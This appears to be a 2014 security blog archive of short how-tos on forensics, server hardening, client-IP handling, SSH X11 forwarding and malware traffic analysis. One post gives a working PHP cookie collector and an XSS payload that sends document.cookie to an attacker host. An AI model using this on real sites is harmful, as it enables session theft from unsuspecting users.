May 10, 2014

Comprehensive and useful Linux I/O stack diagram for finding bottlenecks on a server



 

Source: https://twitter.com/nixcraft/status/464369622565650433/photo/1



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 9, 2014

Howto: Enable 4G LTE On LG G2

1. Dial *#*#4636#*#*

2. Go to Phone Information

3. In the Set Preferred Network Type box, select "LTE/GSM/WCDMA"

Or

1. Dial 3845#*802#
2. Go to LTE-Only
3. Modem Settings
4. RAT Selection
5. Select GSM / WCDMA / LTE auto 


Done



Howto: Forensic Recycle Bin

XP
- C:\Recycler\<per-user-SID>\
- Each user folder holds an INFO2 index file plus the deleted files themselves.
- Deleted files are renamed D<drive letter><index>.<ext> (the post's "DC####"); these hold the content of the deleted file.
- INFO2 contains one record per deleted file:
   -- original path and filename
   -- original size
   -- deletion timestamp
- INFO2 can be parsed with Rifiuti (free tool from Foundstone/McAfee) or its open-source successor rifiuti2

Windows 7 (Vista and later)
- C:\$Recycle.Bin\<per-user-SID>\
- No more INFO2
- Each deletion creates a pair of files sharing one random suffix: $I<suffix>.<ext> and $R<suffix>.<ext>
  -- $I (capital i; a fixed 544 bytes on Vista/7/8) contains
    --- original path and filename
    --- original size
    --- deletion timestamp (FILETIME)
  -- $R contains the content of the deleted file (a $R directory when a folder was deleted)
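As an added worked example (not code from the original post), here is a parser for the $I metadata records described above. It assumes the published $I layout: version 1 (Vista/7/8) is an 8-byte version, 8-byte original size, 8-byte FILETIME deletion time and a fixed 520-byte UTF-16LE path field; version 2 (Windows 10 and later) keeps the 24-byte header and follows it with a 4-byte character count and a variable-length path. The sample records are constructed inline and are not real evidence.

```python
r"""Parse $I records from C:\$Recycle.Bin\<SID>\ and pair them with their $R file.

Added example, not from the original post. Layout assumed: version 1 has a
fixed 520-byte UTF-16LE path (544 bytes total); version 2 has a 4-byte
character count (including the NUL terminator) followed by the path.
"""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100-ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_dollar_i(data: bytes) -> dict:
    """Return version, original size, deletion time and original path of one $I file."""
    if len(data) < 24:
        raise ValueError("too short for a $I header")
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
        if len(raw) != 520:
            raise ValueError("truncated version-1 path field")
        path = raw.decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)  # count includes the NUL terminator
        raw = data[28:28 + nchars * 2]
        if len(raw) != nchars * 2:
            raise ValueError("truncated version-2 path field")
        path = raw.decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError(f"unknown $I version {version}")
    return {"version": version, "original_size": size,
            "deleted_at": filetime_to_datetime(ft), "original_path": path}


def matching_r_name(i_name: str) -> str:
    """$IXXXXXX.ext pairs with $RXXXXXX.ext, which holds the deleted content."""
    if not i_name.startswith("$I"):
        raise ValueError("not a $I file name")
    return "$R" + i_name[2:]


def build_dollar_i(version: int, size: int, deleted_at: datetime, path: str) -> bytes:
    """Build a record in the same layout; used here only to construct sample input."""
    ticks = ((deleted_at - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    header = struct.pack("<QQQ", version, size, ticks)
    encoded = path.encode("utf-16-le")
    if version == 1:
        return header + encoded.ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + encoded + b"\x00\x00"


# Constructed samples (not real evidence).
SAMPLE_V1 = build_dollar_i(1, 1234, datetime(2014, 5, 9, 12, 0, tzinfo=timezone.utc),
                           r"C:\Users\alice\Documents\secret.docx")
SAMPLE_V2 = build_dollar_i(2, 98765, datetime(2020, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
                           r"D:\data\export.csv")

if __name__ == "__main__":
    for name, blob in (("$IABC123.docx", SAMPLE_V1), ("$IDEF456.csv", SAMPLE_V2)):
        print(name, "->", matching_r_name(name), parse_dollar_i(blob))
```

On a real image, read every $I* file under the SID folder with `parse_dollar_i(open(p, "rb").read())` and copy out the $R partner for the content; a $I without a $R (or vice versa) usually means the bin was emptied and the other half has to be carved from unallocated space.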




Howto: Harden LAMP

The L
There are lots of good guides available to help you out. This list may or may not help you depending on your distribution.
- Center for Internet Security Benchmarks - distribution specific for the major flavors
- CentOS Hardening HowTo - follows the CIS RHEL5 guide closely, but is a much easier read
- NIST SP800-123 - Guide to General Server Security
- NSA Hardening Factsheets - not as recently updated as CIS, but still mostly applicable
- Tiger - live system security auditing software

The A
Apache can be fun to secure. I find it easier to harden the OS and maintain usability than either Apache or PHP.
- Apache Server Hardening - this question on the IT Security sister site has lots of good information
- Center for Internet Security Benchmarks - again, Apache benchmarks
- Apache Security Tips - straight from the Apache project; it looks like it covers the basics
- DISA Hardening Checklist - checklist from the DoD Information Assurance guys

The M
- Center for Internet Security Benchmarks - again, but for MySQL
- OWASP MySQL Hardening
- General Security Guidelines - basic checklist from the project devs

The P
This runs headlong into the whole idea of Secure Programming Practices, which is an entire discipline of its own. SANS and OWASP have a ridiculous amount of information on the subject, so I won't try to replicate it here. I will focus on the runtime configuration and let your developers worry about the rest. Sometimes the 'P' in LAMP refers to Perl, but usually PHP. I am assuming the latter.
- Hardening PHP - some minor discussion, also on the IT Security SE site
- Hardened PHP Project - main project that produces Suhosin, a patch to the PHP runtime that protects against certain types of attacks
- Hardening PHP With Suhosin - a brief HowTo specifically for Suhosin
- Hardening PHP from php.ini - short, but not bad, discussion of some of the security-related runtime options


Source: http://www.garage4hackers.com/showthread.php?t=6013



Howto: Simple source code to collect cookies from XSS.

Attacker-side collector: a request carrying ?cookie=... appends one record to xss.log; any other request dumps the log.

<?php
   $filename = 'xss.log';
   if (isset($_GET['cookie']))
   {
       // HTTP_HOST (not HTTP_POST), and append with .= so the earlier lines are not overwritten
       $content  = 'Host: '.$_SERVER['HTTP_HOST'].PHP_EOL;
       $content .= 'Remote Addr: '.$_SERVER['REMOTE_ADDR'].PHP_EOL;
       $content .= 'Cookie: '.$_GET['cookie'].PHP_EOL;
       file_put_contents($filename, $content, FILE_APPEND | LOCK_EX);
   } else
   {
       $data = file_get_contents($filename);
       $convert = explode("\n", $data);
       for ($i = 0; $i < count($convert); $i++)
       {
           // escape before echoing: a crafted cookie value would otherwise run as HTML in this log viewer
           echo htmlspecialchars($convert[$i]).'<br>';
       }
   }
?> 


XSS = <script>window.open("http://hackerwebsite.com/?cookie="+encodeURIComponent(document.cookie))</script>

encodeURIComponent keeps cookie values containing "&" or "+" intact in the query string (the original payload was also missing the closing parenthesis of window.open). Two caveats: window.open is visible to the victim, and cookies set with the HttpOnly flag are never exposed through document.cookie, so they will not reach this log; that is the main reason to set HttpOnly on session cookies.



May 8, 2014

Howto: Detect Client IP with PHP

This post is just a reminder of how to detect the client IP with PHP.

// REMOTE_ADDR is the peer address of the TCP connection and cannot be forged by the client.
// HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are plain request headers (Client-IP, X-Forwarded-For)
// that any client can send, so only believe them when REMOTE_ADDR is one of your own proxies.
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];   // may be a comma-separated chain, not a single address
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}

Used as-is, this lets a client choose the address you log or rate-limit on (including 127.0.0.1 to slip past an "allow localhost" check) simply by sending a Client-IP or X-Forwarded-For header.
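As an added example (not code from the original post), the same lookup done safely: the post's logic is ported as naive_client_ip for comparison, and client_ip only honours X-Forwarded-For for hops that belong to proxies we operate. TRUSTED_PROXIES and the request values are assumptions constructed for the example.

```python
"""Client IP resolution that only trusts forwarding headers from our own proxies.

Added example, not from the original post. TRUSTED_PROXIES is an assumption
for this example; in practice it is the address set of the load balancers or
reverse proxies actually in front of the application.
"""
import ipaddress
from typing import Optional

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8"),
                   ipaddress.ip_network("192.0.2.10/32")]


def naive_client_ip(server: dict) -> str:
    """Port of the post's PHP: believes whatever Client-IP / X-Forwarded-For the client sent."""
    if server.get("HTTP_CLIENT_IP"):
        return server["HTTP_CLIENT_IP"]
    if server.get("HTTP_X_FORWARDED_FOR"):
        return server["HTTP_X_FORWARDED_FOR"]
    return server["REMOTE_ADDR"]


def is_trusted_proxy(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, x_forwarded_for: Optional[str] = None) -> str:
    """Return the nearest hop that is not one of our proxies.

    REMOTE_ADDR is the TCP peer and cannot be forged. If it is not a trusted
    proxy the request came in directly and every forwarding header is ignored.
    Otherwise X-Forwarded-For is walked from the right (the entry appended by
    the proxy nearest us) leftwards, skipping our own proxies; everything to
    the left of the first untrusted hop was written by an untrusted party.
    """
    if not is_trusted_proxy(remote_addr):
        return remote_addr
    hops = [h.strip() for h in (x_forwarded_for or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if is_trusted_proxy(hop):
            continue
        try:
            return str(ipaddress.ip_address(hop))  # normalises the spelling, e.g. for IPv6
        except ValueError:
            break  # a proxy forwarded garbage; do not guess
    return remote_addr


if __name__ == "__main__":
    # Constructed request: attacker connects directly and forges Client-IP.
    forged = {"REMOTE_ADDR": "203.0.113.5", "HTTP_CLIENT_IP": "127.0.0.1"}
    print("naive:", naive_client_ip(forged), "hardened:", client_ip(forged["REMOTE_ADDR"]))
    # Same attacker behind our proxy, which appended the peer it actually saw.
    print("hardened:", client_ip("10.0.0.7", "127.0.0.1, 203.0.113.5"))
```

The only entries a client cannot control are REMOTE_ADDR and the X-Forwarded-For values appended by your own proxies, which is why the walk starts at the right and stops at the first address that is not yours.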




Howto: Using X11 (GUI) via SSH

1. On the server, /etc/ssh/sshd_config must allow forwarding (it is off by default in OpenSSH; restart sshd after changing it):
X11Forwarding yes

2. On the client, either pass -X/-Y on the command line or set the defaults in /etc/ssh/ssh_config (or ~/.ssh/config):
ForwardX11 yes

ForwardX11Trusted yes

3. Connect with the -Y option (trusted forwarding, the same as ForwardX11Trusted yes):
ssh -Y username@target -p port

Caveat: with trusted forwarding (-Y) every program on the remote host gets full access to your local X display, including the keystrokes and screen contents of your other windows, so anyone with root on that host can snoop your session. Prefer -X (untrusted forwarding, restricted by the X SECURITY extension) and fall back to -Y only when the application actually breaks under -X and you trust the remote host.
 


May 5, 2014

Windows Registry Forensics

Please see the full article in Source.
 
The Importance of HIVE Keys

HKEY_CLASSES_ROOT (HKCR):

Contains information in order for the correct program to open when executing a file with Windows Explorer.

HKEY_CURRENT_CONFIG (HKCC):

Provides information about the current hardware profile of the local computer system.

HKEY_LOCAL_MACHINE (HKLM):

The keys under this hive give extensive detail about system memory and installed hardware and software. Subkeys can hold current configuration data, network logon and network security information, server names, and the location of a server.

HKEY_CURRENT_USER (HKCU):

Provides information about the preferences of the current user, including the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences.

HKEY_USERS (HKU):

In this Registry hive, we can locate user-specific configuration information for all the currently active users on a computer. Now you will ask how HKEY_CURRENT_USER differs from this hive. HKEY_CURRENT_USER is a shortcut to the HKEY_USERS sub-key corresponding to your SID (Security Identifier). Now what is a SID? It is just a number used to identify user, group, and computer accounts in Windows. When you make changes in HKEY_CURRENT_USER, you're making changes to the keys and values under the key within HKEY_USERS that's named the same as your SID.



Source: http://resources.infosecinstitute.com/windows-registry-forensics/



Howto: Decrypt HTTPS for malware analysis with Fiddler

1. Install Fiddler from http://www.telerik.com/docs/default-source/fiddler/fiddler4setup.exe

2. In Fiddler, go to Tools > Fiddler Options > HTTPS tab, tick "Decrypt HTTPS traffic" and click OK. Fiddler generates its own root CA and offers to install it in the Windows certificate store of the analysis VM; accept, otherwise the sample's TLS handshake fails instead of being decrypted.

3. Serve fake network services to the malware from REMnux (fakedns for DNS, INetSim for HTTP/HTTPS and the other common protocols) so the sample talks to your lab instead of its real C2.

4. Run the malware and watch the traffic.

Caveat: Fiddler is an HTTP proxy, so it only sees traffic from samples that honour the WinINET/system proxy settings and trust the Windows certificate store. Malware that uses raw sockets, ships its own TLS library, or pins its certificate will not show up decrypted, and you will need a network-level approach instead.

Source: http://www.aldeid.com/wiki/Fiddler#Example:_Decrypting_malware_HTTPS_traffic 



Tools: Volafox Mac OS X Memory Analysis Toolkit

Volafox is an open source toolkit for Mac OS X and BSD memory forensics. The tool is Python based and allows investigating security incidents and finding traces of malware and other malicious programs on the system. A security analyst can obtain the following information with it:
  • Mac OS X kernel version, CPU, and memory specification
  • Mounted filesystems
  • Kernel Extensions listing
  • Process listing
  • Task listing (Finding process hiding)
  • Syscall table (Hooking detection)
  • Mach trap table (Hooking detection)
  • Network socket listing (Hash table)
  • Open files listing by process
  • Show Boot information
  • EFI System Table, EFI Runtime Services
  • Print a hostname

Source: http://www.sectechno.com/2014/05/04/volafox-mac-os-x-memory-analysis-toolkit/


